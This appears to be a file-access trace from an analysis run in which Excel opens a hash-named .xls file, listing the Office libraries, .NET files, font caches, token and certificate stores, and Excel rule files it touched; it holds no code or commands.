C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\d3d10warp.dll
C:\Windows\SysWOW64\d3d10warp.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSO40UIRES.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSO99LRES.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\isolatedwindowsenvironmentutils.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\isolatedwindowsenvironmentutils.dll
C:\Windows\SysWOW64\isolatedwindowsenvironmentutils.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSORES.DLL
C:\Windows\system32
C:
C:\Program Files (x86)\Microsoft Office\root\Office16\1033\XLINTL32.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\XLINTL32.COMMON.DLL
C:\Program Files (x86)\Microsoft Office\root\SystemResources\XLINTL32.COMMON.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\Office16\SystemResources\XLINTL32.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\SystemResources\USER32.dll.mun
C:\Windows\SystemResources\USER32.dll.mun
C:\Users\user\AppData\Roaming\Microsoft\Excel\
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\1033\msointl30.dll
C:\Users\user\AppData\Local\Microsoft\OneAuth\accounts\*
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\kernel32.dll
C:\Windows\SysWOW64\kernel32.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\1033\MSOINTL.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\mscoree.dll.local
C:\Windows\SysWOW64\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE.config
C:\Windows
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\RICHED20.DLL
\??\MountPointManager
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\RICHED20.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\RICHED20.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Licenses\5\Perpetual
C:\ProgramData\Microsoft\OFFICE\Licenses\5\Perpetual
C:\Users\user\AppData\Local\Microsoft\Office\Licenses\5\Grace\1
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Purge\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json
C:\Program Files (x86)\Microsoft Office\root\Office16\winnlsres.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\winnlsres.dll
C:\Windows\SysWOW64\winnlsres.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Temp
C:\Windows\Temp
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Office
C:\Users\user\AppData\Local\Microsoft\Office\16.0
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json
C:\Program Files (x86)\Microsoft Office\root\Office16\FloodgateExperiences\Shared_Definitions.json
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\floodgatecampaigns.json
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\UserFacts\Anonymous\Insights.json
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json
C:\Program Files (x86)\Microsoft Office\root\Office16\DPAPI.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\dpapi.dll
C:\Windows\SysWOW64\dpapi.dll
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\*.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\2018c83c16e29d57e69047a488b1267e21c9c9bf.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e1d3d0538af180de70c8259a1c129c676ec8cbe4.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e1d3d0538af180de70c8259a1c129c676ec8cbe4.tbreq
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\511e4ac7475bb278300d26eadb37bd825eeccd3e.tbres
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Windows\SysWOW64\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Windows\sysnative\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Users\user\AppData\Local\Microsoft\IdentityCache\1\UD
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\bba3ace7da7f8861d7f6d1f68dd676aefa0400bf.tbres
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
C:\Program Files (x86)\Microsoft Office\root\Office16\WININET.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\wininet.dll
C:\Windows\SysWOW64\wininet.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\OART.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.2506_none_6eb991c088050a06
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.2506_none_6eb991c088050a06
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\d2d1.dll.mui
C:\Windows\SysWOW64\en-US\d2d1.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\d2d1.dll.mui
C:\Windows\sysnative\en-US\d2d1.dll.mui
C:\Windows\SysWOW64\cabinet.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\uxtheme.dll.Config
C:\Windows\SysWOW64\uxtheme.dll.Config
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\uxtheme.dll
C:\Windows\SysWOW64\uxtheme.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
\Device\RasAcd
C:\Windows\SysWOW64\TextShaping.dll
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7288BFBC-B57A-4357-9543-D314B2978210
C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\segoeui.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Users\user\AppData\Local\Temp\Diagnostics\UploadCache\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData2.xml
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf
C:\Windows\SysWOW64\textinputframework.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\textinputframework.dll
C:\Users\user
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\31169036496.ttf
C:\Program Files (x86)\Microsoft Office\root\Office16\Fonts\
C:\Windows\Fonts\EUDC.TTE
C:\Users\user\AppData\Roaming\Microsoft\AddIns\
C:\Users\user\AppData\Local\Temp
C:\Users\user\Documents\
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\*.*
C:\Program Files (x86)\Microsoft Office\root\Office16\XLSTART\*.*
C:\Program
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft
C:\Program Files (x86)\Microsoft
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\USER32.dll.mui
C:\Windows\SysWOW64\en-US\USER32.dll.mui
C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls
C:\Users
C:\Users\user\AppData
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf
C:\Users\user\Desktop
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db
C:\Users\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Program Files (x86)\Microsoft Office\root\Office16\CFGMGR32.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\cfgmgr32.dll
C:\Windows\SysWOW64\cfgmgr32.dll
\Device\DeviceApi\CMApi
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\propsys.dll
C:\Windows\SysWOW64\propsys.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\System\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls:Zone.Identifier
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf
C:\Users\user\AppData\Local\Temp\32e843c35f0b39a4ff9d669a80da88322cdd4206caa24710e7fbe60db710597f.xls\
C:\Users\user\AppData\Local\Temp\
C:\Users\user\AppData\Local\
C:\Users\user\AppData\
C:\Users\user\
C:\Users\
\??\Volume{70ce53cd-0000-0000-0000-500600000000}
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf
C:\Users\user\AppData\Local\Temp\~DFFEED631473581C47.TMP
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31864313813.ttf
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\23658217780.ttf
C:\Program Files (x86)\Microsoft Office\root\Office16\GKExcel.dll
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30071215644.ttf
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\33033888851.ttf
C:\Program Files (x86)\Microsoft Office\root\SystemResources\GKExcel.dll.mun
C:\Program Files (x86)\Microsoft Office\root\Office16\CRYPTSP.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\cryptsp.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\GFX.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\MSIMG32.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\msimg32.dll
C:\Windows\SysWOW64\msimg32.dll
C:\Windows\splwow64.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\splwow64.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\splwow64.exe 12288
C:\Windows\splwow64.exe 12288
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows
C:\Users\user\AppData\Local\Microsoft\Office\OTele
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-journal
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule1000v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63067v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120100v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120603v9.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120607v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule840000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120402v21.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120110v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule890004v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule890002v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule890003v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224902v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11950v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10820v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120600v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120608v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120609v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120610v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120611v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120612v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120613v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120614v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120615v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120616v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120617v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120618v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120619v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120620v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120621v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120622v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120623v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120624v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120625v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120626v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120627v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120628v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120629v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120630v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120631v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120632v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120633v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120634v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120635v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120636v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120637v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120638v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120639v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120640v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120641v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120642v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120643v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120644v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120645v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120646v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120647v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120648v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120649v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120650v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120651v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120652v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120653v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120654v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120655v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120656v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120657v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120658v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120659v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120660v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120661v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120662v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120663v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120664v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120665v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120666v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120667v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120668v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120669v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120670v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120671v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120672v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120673v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120674v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120675v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120676v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120677v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120678v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120679v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120680v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120681v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120682v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120602v8.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68022v8.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224901v11.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180135v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90117v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90119v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90120v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90200v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90201v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90204v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90206v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90207v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90208v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90303v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120125v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120127v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120604v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule890000v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180159v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180160v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224082v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224083v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224084v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224060v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224075v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224061v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224062v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224072v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224073v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224074v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224906v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224903v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180202v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180182v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180183v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180181v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule880001v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule880000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule90401v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701201v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701200v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700201v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700200v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702351v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702350v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701251v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701250v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700051v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700050v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702951v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702950v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701151v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701150v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702201v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702200v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700401v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700400v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700351v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700350v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703901v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703900v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701501v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701500v1.xml
